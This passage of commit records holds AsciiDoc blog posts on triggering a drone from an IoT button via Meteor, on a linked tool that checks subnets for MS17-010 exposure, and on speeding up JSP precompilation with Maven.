`\"3\"` will be emitted as the value instead of `\"L\"` if the `ENUM` definition is `enum('S','M','L')`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a60a5ba28ecf2d2d92813b2a4bbb117f6e33a915","subject":"Update 2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","message":"Update 2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","new_file":"_posts\/2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","new_contents":"= Un Sens'it, Meteor et mon Rolling Spider d\u00e9colle\n:hp-tags: Sensit, IoT, Sigfox, Meteor, Parrot, Rolling Spider\n:published_at: 2015-08-31\n:url-blogpost: http:\/\/anthonnyquerouil.fr\/2015\/08\/24\/Sensit-mon-petit-objet-connecte.html\n:url-rolling-spider: http:\/\/www.parrot.com\/fr\/produits\/rolling-spider\/\n:url-sensit: https:\/\/www.sensit.io\/\n\nComme vous l'avez peut-\u00eatre lu dans mon pr\u00e9c\u00e9dent billet \n{url-blogpost}, j'ai r\u00e9cemment fait l'acquisition d'un {url-sensit}[Sens'it]. \n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9440843\/9e9e12bc-4a72-11e5-9485-cc94a6735fbf.JPG[]\n\nJ'ai aussi depuis peu un {url-rolling-spider}[Rolling-spider] que je m'\u00e9tais procur\u00e9 dans le but de le controller avec un peu de code https:\/\/github.com\/ChrisTheBaron\/cylon-rolling-spider[JS] (c'est \u00e0 cause de http:\/\/twitter.com\/k33g_org[@k33g_org] tout \u00e7a). L'heure est venue de mixer le tout !\n\nimage::https:\/\/pbs.twimg.com\/media\/CNiIQfqWoAAhK9m.jpg[]\n\n== L'objectif\n\nL'objectif est plut\u00f4t simple, double cliquer sur le {url-sensit}[Sens'it] et faire d\u00e9coller le {url-rolling-spider}[Rolling-spider].\n\nPour ce faire, voici ce qu'il nous faut :\n\n* Un {url-sensit}[Sens'it],\n* Un Parrot Rolling Spider,\n* Un framework JS permettant de controller le spider (on utilisera https:\/\/github.com\/voodootikigod\/node-rolling-spider[node-rolling-spider] wrapper dans un package meteor https:\/\/atmospherejs.com\/anthonny\/rolling-spider[anthonny:rolling-spider]),\n* Un peu de Meteor pour lier le tout.\n\n\n== L'architecture\n\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9587833\/f979b92c-5024-11e5-9fbf-20a14b2594b8.png[]\n\n1. Le {url-sensit}[Sens'it] va transmettre un message sur le r\u00e9seau SIGFOX,\n2. Les serveurs SIGFOX vont communiquer aux serveurs AXIBLE qu'un message *button* a \u00e9t\u00e9 envoy\u00e9,\n3. AXIBLE va appel\u00e9 l'URL de Callback que nous aurons d\u00e9fini dans l'interface d'administration,\n4. Ce callback pointera sur une application *sensit.meteor.com* que nous aurons d\u00e9ploy\u00e9e au pr\u00e9alable,\n5. Cette derni\u00e8re enregistrera une trace de l'appel dans une collection Mongo,\n6. Notre application cliente \u00e9tablira une connexion DDP avec l'application *sensit.meteor.com*, et observera les changements effectu\u00e9s sur cette collection,\n7. 
Au premier changement d\u00e9tect\u00e9, on d\u00e9colle.\n\n== La remote-app : sensit.meteor.com\n\n=== D\u00e9finition de l'URL de callback\nDans l'interface {url-sensit}[Sens'it], nous allons sp\u00e9cifier une URL de callback pour les notifications de type *button*.\n\nPour rappel, ce callback est appel\u00e9 via un GET et peut recevoir en query param certaines valeurs (via des variables {{my_var}}) :\n\n* device_id\n* device_serial_number\n* sensor_id\n* mode\n* notification_type\n* data\n* date\n\nNous pouvons donc d\u00e9finir l'URL suivante :\n\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_id={{device_id}}&device_serial_number={{device_serial_number}}&sensor_id={{sensor_id}}&mode={{mode}}&notification_type={{notification_type}}&data={{data}}&date={{date}}\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629320\/160ef888-5172-11e5-895a-460308bc2a5c.png[]\n\n=== L'application Meteor\nNous cr\u00e9ons notre application *meteor* :\n[source, shell]\n----\nmeteor create remote-app\ncd remote-app\nmeteor remove autopublish insecure\nrm remote-app.*\nmkdir server\ntouch server\/main.js\n----\n\nPour la gestion des routes, on utilisera http:\/\/iron-meteor.github.io\/iron-router\/[iron-router] :\n[source, shell]\n----\nmeteor add iron:router\n----\n\nCommen\u00e7ons par cr\u00e9er une collection `notification` qui aura pour but de stocker les diff\u00e9rentes notifications re\u00e7ues.\n\n[source, javascript]\n----\nNotification = new Meteor.Collection(\"notification\");\n----\n\nIl faut ensuite d\u00e9finir notre endpoint qui r\u00e9pondra \u00e0 l'appel du callback.\n\n[source, javascript]\n----\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n----\n\nNous d\u00e9finissons une route `\/sensit-callback\/:type` dans laquelle `:type` peut prendre une des valeurs suivantes `['temperature', 'motion', 'button']`. 
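\n\n\u00c0 titre d'illustration (document fictif, reconstruit \u00e0 partir des param\u00e8tres list\u00e9s ci-dessus), une `notification` de type *button* stock\u00e9e en base ressemblera \u00e0 ceci :\n\n[source, javascript]\n----\n{\n type: 'button',\n device_id: '1234',\n device_serial_number: 'ABCDE',\n sensor_id: '5678',\n mode: '6',\n notification_type: 'generic_punctual',\n date: '2015-09-01T17:37Z',\n data: {\n first_name: 'Anthonny',\n sensit_name: '',\n last_name: 'Querouil',\n device_id: 'ABCDE'\n }\n}\n----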
\n\nOn construit ensuite un objet `notification` \u00e0 partir du `type` et des queryParam (on force la conversion en JSON du param\u00e8tre `data` car c'est un objet JSON stringifi\u00e9).\n\nEnfin on ins\u00e8re notre `notification` en base et on r\u00e9pond en confirmant l'enregistrement.\n\nPour que les informations pr\u00e9sentes dans notre collection soient accessibles par notre \"client\", il faut les publier (au passage, on va g\u00e9rer les autres types) :\n\n[source, javascript]\n----\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\n----\n\nLe code complet :\n[source, javascript, title=remote-app\/server\/main.js]\n----\nNotification = new Meteor.Collection(\"notification\");\n\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\n----\n\n=== Un peu de test\nOn d\u00e9marre l'application :\n[source, shell]\n----\nmeteor\n----\n\nOn requ\u00eate l'url :\n----\nhttp:\/\/localhost:3000\/sensit-callback\/button?device_serial_number=ABCDE&notification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629955\/06bdd084-5177-11e5-8e5b-1aa1478a6413.png[]\n\nLe service r\u00e9pond correctement, et notre `notification` est bien enregistr\u00e9e :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630035\/b0f0abee-5177-11e5-95dd-1dd622648fce.png[]\n\n=== Le d\u00e9ploiement\nL'application sera d\u00e9ploy\u00e9e sur l'URL *sensit.meteor.com* :\n\n[source, shell]\n----\nmeteor deploy sensit.meteor.com\n----\n\nPour valider le bon d\u00e9ploiement, on peut reprendre le test effectu\u00e9 au pr\u00e9alable et le faire pointer sur notre \"production\" :\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_serial_number=ABCDE&notification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nEnfin, on v\u00e9rifie que la `notification` est bien pr\u00e9sente en base :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630272\/66e493a6-5179-11e5-9230-36ecf85d83e1.png[]\n\n== La local-app : sensit-meteor-rs\n\nNous avons d\u00e9sormais un *backend* qui prend en compte les diff\u00e9rentes notifications, il nous faut maintenant une application qui 
tournera *localement* et qui r\u00e9agira aux changements qui surviennent dans le backend.\n\n\n=== L'application\n\n[source,shell]\n----\nmeteor create local-app\ncd local-app\nmeteor remove autopublish insecure\nrm local-app.*\nmkdir server\ntouch server\/main.js\n----\n\nNous allons initier une connexion https:\/\/www.meteor.com\/ddp[DDP] avec notre *backend* et \u00e9couter les changements qui sont faits sur la collection `notification`. \nPour chaque notification ajout\u00e9e dans cette collection que nous appellerons `RemoteNotification`, nous ajouterons une copie dans notre collection *locale* `Notification` :\n\n[source, javascript]\n----\n\/\/ D\u00e9claration de la connexion\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nremote.subscribe('remote-button');\n\n\/\/ On \u00e9coute les changements effectu\u00e9s sur la collection en Remote\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item added --');\n \/\/ On upsert dans la collection de Notification locale\n Notification.upsert({_id: notification._id}, {$set: notification});\n }\n});\n----\n\n\nIl ne nous reste plus qu'\u00e0 faire d\u00e9coller le spider lorsqu'une `notification` est ajout\u00e9e en local :\n\n[source, javascript]\n----\nvar rollingSpider = new RollingSpider();\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n \/\/ On observe la collection Notification, au premier ajout on decolle !\n Notification.find().observe({\n added: function (notification) {\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n });\n }));\n}));\n----\n\nLe code complet :\n[source, javascript, title=local-app\/server\/main.js]\n----\nvar Notification = new Meteor.Collection(\"notification\");\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nvar rollingSpider = new RollingSpider();\nvar isFlying = false;\n\n\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item --');\n console.log(notification);\n Notification.upsert({_id: notification._id}, {$set: notification});\n }\n});\nremote.subscribe('remote-button');\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n Notification.find().observe({\n added: function (notification) {\n if (!isFlying) {\n isFlying = true;\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n }\n });\n }));\n}));\n----\n\n\n=== D\u00e9collage !\n\nvideo::8DY4bsKOm5g[youtube]\n\n== Conclusion\n\nCe billet est l'occasion de mettre en avant la connexion entre deux applications https:\/\/www.meteor.com[Meteor] via le protocole https:\/\/www.meteor.com\/ddp[DDP] et de vous montrer qu'avec du javascript, on se marre bien (en tout cas, c'est vrai pour moi :) ).\n\nSi vous avez des projets similaires, n'h\u00e9sitez pas \u00e0 m'en faire part, ce sera un plaisir d'\u00e9changer dessus.\n","old_contents":"= Un Sens'it, Meteor et Rolling Spider d\u00e9colle\n:hp-tags: Sensit, IoT, Sigfox, Meteor, Parrot, Rolling Spider\n:published_at: 2015-08-31\n:url-blogpost: 
http:\/\/anthonnyquerouil.fr\/2015\/08\/24\/Sensit-mon-petit-objet-connecte.html\n:url-rolling-spider: http:\/\/www.parrot.com\/fr\/produits\/rolling-spider\/\n:url-sensit: https:\/\/www.sensit.io\/\n\nComme vous l'avez peut-\u00eatre lu dans mon pr\u00e9c\u00e9dent billet \n{url-blogpost}, j'ai r\u00e9cemment fait l'acquisition d'un {url-sensit}[Sens'it]. \n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9440843\/9e9e12bc-4a72-11e5-9485-cc94a6735fbf.JPG[]\n\nJ'ai aussi depuis peu un {url-rolling-spider}[Rolling-spider] que je m'\u00e9tais procur\u00e9 dans le but de le controller avec un peu de code https:\/\/github.com\/ChrisTheBaron\/cylon-rolling-spider[JS] (c'est \u00e0 cause de http:\/\/twitter.com\/k33g_org[@k33g_org] tout \u00e7a). L'heure est venue de mixer le tout !\n\nimage::https:\/\/pbs.twimg.com\/media\/CNiIQfqWoAAhK9m.jpg[]\n\n== L'objectif\n\nL'objectif est plut\u00f4t simple, double cliquer sur le {url-sensit}[Sens'it] et faire d\u00e9coller le {url-rolling-spider}[Rolling-spider].\n\nPour ce faire, voici ce qu'il nous faut :\n\n* Un {url-sensit}[Sens'it],\n* Un Parrot Rolling Spider,\n* Un framework JS permettant de controller le spider (on utilisera https:\/\/github.com\/voodootikigod\/node-rolling-spider[node-rolling-spider] wrapper dans un package meteor https:\/\/atmospherejs.com\/anthonny\/rolling-spider[anthonny:rolling-spider]),\n* Un peu de Meteor pour lier le tout.\n\n\n== L'architecture\n\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9587833\/f979b92c-5024-11e5-9fbf-20a14b2594b8.png[]\n\n1. Le {url-sensit}[Sens'it] va transmettre un message sur le r\u00e9seau SIGFOX,\n2. Les serveurs SIGFOX vont communiquer aux serveurs AXIBLE qu'un message *button* a \u00e9t\u00e9 envoy\u00e9,\n3. AXIBLE va appel\u00e9 l'URL de Callback que nous aurons d\u00e9fini dans l'interface d'administration,\n4. Ce callback pointera sur une application *sensit.meteor.com* que nous aurons d\u00e9ploy\u00e9e au pr\u00e9alable,\n5. Cette derni\u00e8re enregistrera une trace de l'appel dans une collection Mongo,\n6. Notre application cliente \u00e9tablira une connexion DDP avec l'application *sensit.meteor.com*, et observera les changements effectu\u00e9s sur cette collection,\n7. 
Au premier changement d\u00e9tect\u00e9, on d\u00e9colle.\n\n== La remote-app : sensit.meteor.com\n\n=== D\u00e9finition de l'URL de callback\nDans l'interface {url-sensit}[Sens'it], nous allons sp\u00e9cifier une URL de callback pour les notifications de type *button*.\n\nPour rappel, ce callback est appel\u00e9 via un GET et peut recevoir en query param certaines valeurs (via des variables {{my_var}}) :\n\n* device_id\n* device_serial_number\n* sensor_id\n* mode\n* notification_type\n* data\n* date\n\nNous pouvons donc d\u00e9finir l'URL suivante :\n\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_id={{device_id}}&device_serial_number={{device_serial_number}}&sensor_id={{sensor_id}}&mode={{mode}}¬ification_type={{notification_type}}&data={{data}}&date={{date}}\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629320\/160ef888-5172-11e5-895a-460308bc2a5c.png[]\n\n=== L'application Meteor\nNous cr\u00e9ons notre application *meteor* :\n[source, shell]\n----\nmeteor create remote-app\ncd remote-app\nmeteor remove autopublish insecure\nrm remote-app.*\nmkdir server\ntouch server\/main.js\n----\n\nPour la gestion des routes, on utilisera http:\/\/iron-meteor.github.io\/iron-router\/[iron-router] :\n[source, javascript]\n----\nmeteor add iron:router\n----\n\nCommen\u00e7ons par cr\u00e9er une collection `notification` qui aura pour but de stocker les diff\u00e9rentes notifications re\u00e7ues.\n\n[source, javascript]\n----\nNotification = new Meteor.Collection(\"notification\");\n----\n\nIl faut ensuite d\u00e9finir notre endpoint qui r\u00e9pondra \u00e0 l'appel du callback.\n\n[source, javascript]\n----\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n----\n\nNous d\u00e9finissons une route `\/sensit-callback\/:type` dans laquelle `:type` peut prendre une des valeurs suivantes `['temperature', 'motion', 'button']`. 
\n\nOn construit ensuite un objet `notification` \u00e0 partir du `type` et des queryParam (on force la conversion en JSON du param\u00e8tre `data` car c'est un objet JSON stringifi\u00e9).\n\nEnfin on ins\u00e8re notre `notification` en base et on r\u00e9pond en confirmant l'enregistrement.\n\nPour que les informations pr\u00e9sentes dans notre collection soient accessibles par notre \"client\", il faut les publier (au passage, on va g\u00e9rer les autres types) :\n\n[source, javascript]\n----\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\n----\n\nLe code complet :\n[source, javascript, title=remote-app\/server\/main.js]\n----\nNotification = new Meteor.Collection(\"notification\");\n\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\n----\n\n=== Un peu de test\nOn d\u00e9marre l'application :\n[source, javascript]\n----\nmeteor\n----\n\nOn requ\u00eate l'url :\n----\nhttp:\/\/localhost:3000\/sensit-callback\/button?device_serial_number=ABCDE¬ification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629955\/06bdd084-5177-11e5-8e5b-1aa1478a6413.png[]\n\nLe service r\u00e9pond correctement, et notre `notification` est bien enregistr\u00e9e :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630035\/b0f0abee-5177-11e5-95dd-1dd622648fce.png[]\n\n=== Le d\u00e9ploiement\nL'application sera d\u00e9ploy\u00e9e sur l'URL *sensit.meteor.com* :\n\n[source, javascript]\n----\nmeteor deploy sensit.meteor.com\n----\n\nPour valider le bon d\u00e9ploiement, on peut reprendre le test effectu\u00e9 au pr\u00e9alable et le faire pointer sur notre \"production\" :\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_serial_number=ABCDE¬ification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nEnfin, on v\u00e9rifie que la `notification` est bien pr\u00e9sente en base :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630272\/66e493a6-5179-11e5-9230-36ecf85d83e1.png[]\n\n== La local-app : sensit-meteor-rs\n\nNous avons d\u00e9sormais un *backend* qui prend en compte les diff\u00e9rentes notifications, il nous faut maintenant une application qui 
tournera *localement* et qui r\u00e9agira aux changements qui surviennent dans le backend.\n\n\n=== L'application\n\n[source,shell]\n----\nmeteor create local-app\ncd local-app\nmeteor remove autopublish insecure\nrm local-app.*\nmkdir server\ntouch server\/main.js\n----\n\nNous allons initier une connexion https:\/\/www.meteor.com\/ddp[DDP] avec notre *backend* et \u00e9couter les changements qui sont faits sur la collection `notification`. \nPour chaque notification ajout\u00e9e dans cette collection que nous appellerons `RemoteNotification`, nous ajouterons une copie dans notre collection *locale* `Notification` :\n\n[source, javascript]\n----\n\/\/ D\u00e9claration de la connexion\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nremote.subscribe('remote-button');\n\n\/\/ On \u00e9coute les changements effectu\u00e9s sur la collection en Remote\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item added --');\n \/\/ On upsert dans la collection de Notification locale\n Notification.upsert({notification._id}, {$set: notification});\n }\n});\n----\n\n\nIl ne nous reste plus qu'\u00e0 faire d\u00e9coller le spider lorsqu'une `notification` est ajout\u00e9e en local :\n\n[source, javascript]\n----\nvar rollingSpider = new RollingSpider();\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n \/\/ On observe la collection Notification, au premier ajout on decolle !\n Notification.find().observe({\n added: function (notification) {\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n });\n }));\n}));\n----\n\nLe code complet :\n[source, javascript, title=local-app\/server\/main.js]\n----\nvar Notification = new Meteor.Collection(\"notification\");\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nvar isFlying = false;\n\n\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item --');\n console.log(notification);\n Notification.upsert({_id: notification._id}, {$set: notification});\n }\n});\nremote.subscribe('remote-button');\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n Notification.find().observe({\n added: function (notification) {\n if (!isFlying) {\n isFlying = true;\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n }\n });\n }));\n}));\n----\n\n\n=== D\u00e9collage !\n\nvideo::8DY4bsKOm5g[youtube]\n\n== Conclusion\n\nCe billet est l'occasion de mettre en avant la connexion entre deux applications https:\/\/www.meteor.com[Meteor] via le protocole https:\/\/www.meteor.com\/ddp[DDP] et de vous montrer qu'avec du javascript, on se marre bien (en tout cas, c'est vrai pour moi :) ).\n\nSi vous avez des projets similaires, n'h\u00e9sitez pas \u00e0 m'en faire part, ce sera un plaisir d'\u00e9changer dessus.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f716dd55f0fd6d5573d50eb23e6eef6a1dc63480","subject":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","message":"Update 
2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check whether a Windows machine is vulnerable to the DoublePulsar \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WannaCry ransomware]).\n\nThe tool is great; however, it only checks a single IP address, so I forked it and made a quick modification so that it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","old_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomeware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the DoublePulsar \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WanaCrypt ransomware].)\n\nThe tool is great, however it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ffa118026746ca28cf6b1f5378435f230ec117c8","subject":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","message":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_contents":":hp-tags: Tomcat JSP Maven\n\n= How to compile JSP with Tomcat and Maven faster\n\nWhen I must pre-compile JSPs with Tomcat, it's usually painful because it takes a lot of time.\nLet's see how to compile them faster.\n\n== How to compile JSP\n\nTo compile JSPs for Tomcat, I usually use this Maven plugin: https:\/\/github.com\/leonardehrenfried\/jspc-maven-plugin\nI use this plugin because it's pretty simple, and it provides the ability to add includes\/excludes of JSPs.\nThis Maven config does the job in a WAR project: \n\n[source,xml]\n====\n<web-app *metadata-complete=\"true\"*>\n\nTODO\n\n<\/web-app>\n====\n\n== Some problems of this plugin\n\nIf we have many JSPs (> 500), the plugin can take a lot of time to compile all the files (see the benchmark below).\nThe other problem is that this plugin will stop and fail at the first JSP that contains an error. \nAnd it even stops at the first error in the JSP! 
If a JSP contains 5 errors, we must run the plugin 5 times to discover them all.\nSo if a big project contains multiple errors, we must run the plugin many times, and therefore run the full compilation of all the JSPs many times.\n\n== First fix : performance\n\nIn order to compile a big project faster, I propose several changes.\n\n=== Give all JSPs to Jasper JSPC\n\nIn version 1.1.0 of the plugin, it takes all of the JSPs and executes JSPC for each of them.\nThis is the code : \n\n[source,java]\n====\nfor (String fileName : jspFiles) {\n\tjspc.setJspFiles(fileName);\n\tgetLog().info(\"Compiling \" + fileName);\n\tjspc.execute();\n}\n\n====\n\nMaybe it was an optimization with Tomcat 6.X, but I think with Tomcat 8.X it's slower than giving all the JSPs directly to JSPC.execute().\nSee pull request TODO to fix this.\n\n=== Execute compilation in parallel\n\nTo compile faster we need to compile in parallel.\nIndeed, when we launch Java Mission Control for example, we see the CPU is only at 20%-30% usage while compiling.\nTo increase CPU usage, we need to execute JSPC in different threads.\nSee pull request TODO to add this feature.\n\n
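To make the idea concrete, here is a rough sketch of what running JSPC on several threads could look like. It is only an illustration: `partition` is a hypothetical helper that splits the list into `threads` chunks, `createJspc()` stands for whatever builds a configured Tomcat `JspC` instance, and error handling is reduced to propagating the first failure.\n\n[source,java]\n====\nExecutorService pool = Executors.newFixedThreadPool(threads);\nList<Future<?>> results = new ArrayList<>();\nfor (List<String> chunk : partition(jspFiles, threads)) {\n\tresults.add(pool.submit(() -> {\n\t\tJspC jspc = createJspc(); \/\/ one JspC instance per thread\n\t\tjspc.setJspFiles(String.join(\",\", chunk));\n\t\tjspc.execute();\n\t\treturn null;\n\t}));\n}\nfor (Future<?> result : results) {\n\tresult.get(); \/\/ rethrows the first compilation failure\n}\npool.shutdown();\n====\n\n=== Benchmark\n\nI made a little benchmark with two projects : one with 400 jsp and one with 3000 jsp.\nI tested this on an HP ZBook i7 running Windows 7.\n\n* 400 jsp\n\n|===\n| |Time |Java Heap |CPU\n\n|out of the box 1.1.0\n|50s\n|1.3Gb\n|20%-30%\n\n|Giving all jsp to jspc.execute\n|30s\n|1.1Gb\n|20%-30%\n\n|With 2 threads\n|21s\n|1.35Gb\n|60%\n\n|With 4 threads\n|17s\n|1.35Gb\n|90%\n|===","old_contents":":hp-tags: Tomcat JSP Maven\n\n= How to compile JSP with Tomcat and Maven faster\n\nWhen I must pre-compile JSP with tomcat, it's usually pain because it takes a lot of time.\nLet's see How compile this faster.\n\n== How to compile JSP\n\nIf I must compile for tomcat, I usually take this Maven plugin : https:\/\/github.com\/leonardehrenfried\/jspc-maven-plugin\nI take this plugin because I think it's pretty simple, and it give availabilty to add includes\/excludes of jsp.\nThis Maven config to the job in War project : \n\n[source,xml]\n====\n<web-app *metadata-complete=\"true\"*>\n\nTODO\n\n<\/web-app>\n====\n\n== Some problems of this plugin\n\nIf we have many jsp (> 500) the plugin can take lot of time to compile all files. (see the benchmark after)\nThe other problem is this plugin will stop and fail at the first jsp who contains error. \nAnd even at the first error in the jsp! 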
